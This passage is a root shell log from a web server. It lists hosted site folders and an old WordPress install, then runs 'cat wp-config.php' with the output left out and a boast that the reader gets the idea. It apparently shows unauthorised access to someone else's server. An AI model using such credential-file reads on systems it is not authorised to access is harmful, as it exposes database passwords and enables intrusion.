-rw-r--r-- 1 root root 4229120 2007-05-05 16:24 html.tar drwxr-xr-x 3 root root 4096 2008-05-24 04:10 icons drwxr-xr-x 4 eira eira 4096 2006-11-18 16:19 img -rw-r--r-- 1 root root 12584960 2007-05-05 16:24 img.tar drwxr-xr-x 7 eira eira 4096 2010-03-05 02:10 irontrader drwxr-xr-x 15 eira eira 4096 2010-07-14 05:43 kitepower drwxr-xr-x 14 root root 12288 2008-03-14 07:48 manual drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 mauri -rw-r--r-- 1 root root 20480 2007-05-05 16:24 mauri.tar drwxr-xr-x 2 eira eira 4096 2009-05-17 06:43 mdarredamenti drwxr-xr-x 17 eira eira 4096 2011-10-09 06:53 miniatures drwxr-xr-x 10 eira eira 4096 2009-05-07 12:50 molino drwxr-xr-x 18 eira eira 4096 2011-06-25 03:32 pavimenti drwxr-xr-x 6 eira eira 4096 2011-06-25 18:02 supportservice drwxr-xr-x 9 eira eira 4096 2010-08-08 12:59 trieste drwxr-xr-x 3 eira eira 4096 2008-07-14 13:39 ts_affitta drwxr-xr-x 2 webalizer root 12288 2011-10-01 04:22 usage drwxr-xr-x 6 eira eira 4096 2007-01-02 07:24 virtualftp drwxr-xr-x 14 eira eira 4096 2011-06-24 11:59 westistramodus drwxr-xr-x 2 eira eira 4096 2010-03-01 03:31 wip [root@mail www]# cd mauri [root@mail mauri]# ls -al total 84 drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 . drwxr-xr-x 36 root root 4096 2011-06-23 02:56 .. drwxrwxr-x 2 eira eira 4096 2008-02-15 13:47 ~atc drwxrwxr-x 2 eira eira 4096 2007-11-26 16:04 avatar drwxrwxr-x 5 eira eira 4096 2008-02-16 04:53 blog drwxrwxr-x 2 eira eira 4096 2011-05-30 08:11 DOM_PDF drwxr-xr-x 2 eira eira 4096 2008-03-13 10:05 file -rw-r--r-- 1 eira eira 4356 2007-08-14 11:37 index.html-1 -rw-r--r-- 1 eira eira 4565 2007-10-08 11:48 index.html-2 -rw-rw-r-- 1 eira eira 2217 2011-04-05 04:22 index.php -rw-r--r-- 1 eira eira 4697 2007-10-08 11:56 index.php-1 -rw-r--r-- 1 eira eira 224 2008-06-06 18:06 ip.php drwxrwxr-x 2 eira eira 4096 2008-03-13 09:37 lib drwxr-xr-x 3 eira eira 4096 2010-05-06 05:40 PHP_PDF drwxrwxr-x 2 eira eira 4096 2009-05-20 07:22 prove_cetekor drwxrwxr-x 3 eira eira 4096 2008-06-23 12:46 prove_G45v drwxr-xr-x 2 eira eira 4096 2007-10-08 11:46 styles [root@mail mauri]# ls -al total 84 drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 . drwxr-xr-x 36 root root 4096 2011-06-23 02:56 .. drwxrwxr-x 2 eira eira 4096 2008-02-15 13:47 ~atc drwxrwxr-x 2 eira eira 4096 2007-11-26 16:04 avatar drwxrwxr-x 5 eira eira 4096 2008-02-16 04:53 blog drwxrwxr-x 2 eira eira 4096 2011-05-30 08:11 DOM_PDF drwxr-xr-x 2 eira eira 4096 2008-03-13 10:05 file -rw-r--r-- 1 eira eira 4356 2007-08-14 11:37 index.html-1 -rw-r--r-- 1 eira eira 4565 2007-10-08 11:48 index.html-2 -rw-rw-r-- 1 eira eira 2217 2011-04-05 04:22 index.php -rw-r--r-- 1 eira eira 4697 2007-10-08 11:56 index.php-1 -rw-r--r-- 1 eira eira 224 2008-06-06 18:06 ip.php drwxrwxr-x 2 eira eira 4096 2008-03-13 09:37 lib drwxr-xr-x 3 eira eira 4096 2010-05-06 05:40 PHP_PDF drwxrwxr-x 2 eira eira 4096 2009-05-20 07:22 prove_cetekor drwxrwxr-x 3 eira eira 4096 2008-06-23 12:46 prove_G45v drwxr-xr-x 2 eira eira 4096 2007-10-08 11:46 styles [root@mail mauri]# cd blog [root@mail blog]# ls -al total 252 drwxrwxr-x 5 eira eira 4096 2008-02-16 04:53 . drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 .. -rw-r--r-- 1 eira eira 186 2008-02-16 04:51 .htaccess -rw-r--r-- 1 eira eira 94 2006-11-19 01:56 index.php -rw-r--r-- 1 eira eira 15127 2003-04-01 07:12 license.txt -rw-r--r-- 1 eira eira 7635 2007-08-28 13:01 readme.html drwxr-xr-x 7 eira eira 4096 2008-02-04 22:06 wp-admin -rw-r--r-- 1 eira eira 33489 2007-12-27 18:47 wp-app.php -rw-r--r-- 1 eira eira 129 2007-08-02 18:45 wp-atom.php -rw-r--r-- 1 eira eira 997 2007-05-09 10:18 wp-blog-header.php -rw-r--r-- 1 eira eira 2923 2007-07-04 10:12 wp-comments-post.php -rw-r--r-- 1 eira eira 153 2007-08-02 18:45 wp-commentsrss2.php -rw-r--r-- 1 eira eira 947 2007-10-22 07:05 wp-config.php -rw-r--r-- 1 eira eira 965 2007-05-12 12:29 wp-config-sample.php drwxr-xr-x 6 eira eira 4096 2008-02-04 22:06 wp-content -rw-r--r-- 1 eira eira 851 2007-08-02 18:45 wp-cron.php -rw-r--r-- 1 eira eira 120 2006-11-19 01:56 wp-feed.php drwxr-xr-x 4 eira eira 4096 2008-02-04 22:06 wp-includes -rw-r--r-- 1 eira eira 1525 2007-09-23 13:25 wp-links-opml.php -rw-r--r-- 1 eira eira 16654 2007-09-25 17:17 wp-login.php -rw-r--r-- 1 eira eira 5587 2007-12-29 13:38 wp-mail.php -rw-r--r-- 1 eira eira 296 2007-09-18 16:23 wp-pass.php -rw-r--r-- 1 eira eira 190 2007-08-02 18:45 wp-rdf.php -rw-r--r-- 1 eira eira 251 2006-10-11 03:26 wp-register.php -rw-r--r-- 1 eira eira 129 2007-08-02 18:45 wp-rss2.php -rw-r--r-- 1 eira eira 127 2007-08-02 18:45 wp-rss.php -rw-r--r-- 1 eira eira 10834 2007-12-20 20:57 wp-settings.php -rw-r--r-- 1 eira eira 3520 2007-08-02 18:45 wp-trackback.php -rw-r--r-- 1 eira eira 61403 2008-02-04 12:52 xmlrpc.php [root@mail blog]# cat wp-config.php ....Etc....I think you get the fish.

Sphere: Related Content